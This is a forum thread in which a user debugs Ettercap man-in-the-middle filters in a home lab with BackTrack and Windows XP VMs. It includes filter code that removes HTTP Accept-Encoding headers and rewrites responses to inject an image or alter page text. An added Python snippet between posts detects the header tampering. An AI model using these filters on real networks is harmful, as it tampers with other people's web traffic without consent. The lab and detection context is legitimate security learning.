Thread: Ettercap Filter issue with Replace

  1. #1
    Just burned his ISO
    Join Date
    Sep 2012
    Posts
    4

    Ettercap Filter issue with Replace

    Hi,

    I have been poring over the Internet and especially this forum the last few days to try to find an answer to my problem.
    I see in the past many people have had issues with getting Ettercap Filters to work, and I guess I am now one of them.

    I just wanted to try the IronGeek Image Replacement script in my own Lab, which can be found here: http://www.irongeek.com/i.php?page=s...ettercapfilter

    I'm running two VMs:

    1. BT5 R3 Gnome 64 Bit (though I have tried this now on BT4 R2, BT5, R2)
    2. Windows XP SP2

    The filter from the website is this one below:

    Code:
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!");
          # note: replacement string is same length as original string
          msg("zapped Accept-Encoding!\n");
       }
    }
    if (ip.proto == TCP && tcp.src == 80) {
       replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
       replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
       msg("Filter Ran.\n");
    }

    With this one, no images are replaced however sometimes at the bottom of the page a line that might have a javascript src tag will be changed to the image link.
    Wireshark shows that the TCP packets are coming in out of Order and calling for Retransmission. I can see inside that they are getting changed but - then it looks like a re-transmission occurs and they are getting replaced maybe?
    I switched the script up some, and replaced it with one I found on this website to just change the Title Tag:

    Code:
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!");
          # note: replacement string is same length as original string
          msg("zapped Accept-Encoding!\n");
       }
    }

    if (ip.proto == TCP && tcp.src == 80) {
       msg("in Second IF\n");
       if (search(DECODED.data, "Hello")){
          replace("Hello", "12345");
          msg("run\n");
       }

       if (search(DATA.data, "Google")){
          replace("Google", "GOOGLE HACKED");
          msg("run2\n");
       }
    }

    This one is even more interesting, as if a page has those keywords in it, I'll get a page cannot be displayed. On both I'm getting the msgs that the script is getting triggered.. /sigh
    Any ideas?

    I've uncommented the lines in etter.conf for the iptables.. I'm also only running ettercap with this, not sslstrip etc..

    Thanks for any help you can provide

    -DV
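
Seen from the web server, a proxy or an IDS, the request-side rule of the filter quoted above leaves a trace: `Accept-Encoding` is gone and a header of the same name length carrying a content-coding list sits in its place. The Python check below is an added example, not part of the original post or of Ettercap; it generalizes beyond the literal string `Accept-Rubbish!`, and the coding list, function names and sample requests are constructed for illustration.

```python
"""Flag HTTP requests whose Accept-Encoding header name was overwritten in transit."""

# Content-codings browsers commonly advertise (assumed list, not exhaustive).
CODINGS = {"gzip", "deflate", "br", "zstd", "compress", "identity", "*"}
TARGET = "accept-encoding"


def parse_headers(raw: bytes) -> list[tuple[str, str]]:
    """Return (name, value) pairs from a raw HTTP/1.x request head."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    pairs = []
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            pairs.append((name.strip(), value.strip()))
    return pairs


def looks_like_coding_list(value: str) -> bool:
    """True if every comma-separated token is a content-coding (q-values ignored)."""
    tokens = [t.split(";", 1)[0].strip().lower() for t in value.split(",")]
    return all(t in CODINGS for t in tokens)


def find_rewritten_accept_encoding(raw: bytes) -> list[str]:
    """Names of headers that look like an in-place overwrite of Accept-Encoding."""
    headers = parse_headers(raw)
    if any(name.lower() == TARGET for name, _ in headers):
        return []  # the real header survived, nothing to report
    # An in-place overwrite keeps the name length and leaves the value untouched.
    # Length alone is not enough: Accept-Language is also 15 characters long.
    return [name for name, value in headers
            if len(name) == len(TARGET) and looks_like_coding_list(value)]


# Constructed sample requests (not captured traffic).
TAMPERED = (b"GET / HTTP/1.1\r\nHost: lab.example\r\n"
            b"Accept-Rubbish!: gzip, deflate\r\nAccept-Language: en-us\r\n\r\n")
CLEAN = (b"GET / HTTP/1.1\r\nHost: lab.example\r\n"
         b"Accept-Encoding: gzip, deflate\r\nAccept-Language: en-us\r\n\r\n")
NO_ENCODING = b"GET / HTTP/1.1\r\nHost: lab.example\r\nAccept-Language: en-us\r\n\r\n"

if __name__ == "__main__":
    for label, req in (("tampered", TAMPERED), ("clean", CLEAN), ("none", NO_ENCODING)):
        print(label, find_rewritten_accept_encoding(req))
```
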

  2. #2
    Just burned his ISO
    Join Date
    Sep 2012
    Posts
    4

    Re: Ettercap Filter issue with Replace

    Just a quick follow up:

    I figured out one problem, I was editing a different etter.conf file, it appears on BT5 R3 there are 2?
    One in /etc/ and one in /usr/local/etc the second one being the one that the ettercap utility was using on my VM.

    However, I am still running into the same issues, the web page will just remain unaltered and I keep seeing the TCP Out of Order messages.

    Once again, thanks for any help in advance

  3. #3
    Just burned his ISO
    Join Date
    Sep 2012
    Posts
    4

    Re: Ettercap Filter issue with Replace

    I think I have isolated the problem, it appears that if I'm using VMs from VirtualBox the tests will fail.
    However, if I use two separate computers or if I use VMWare it seems to work. Weird!
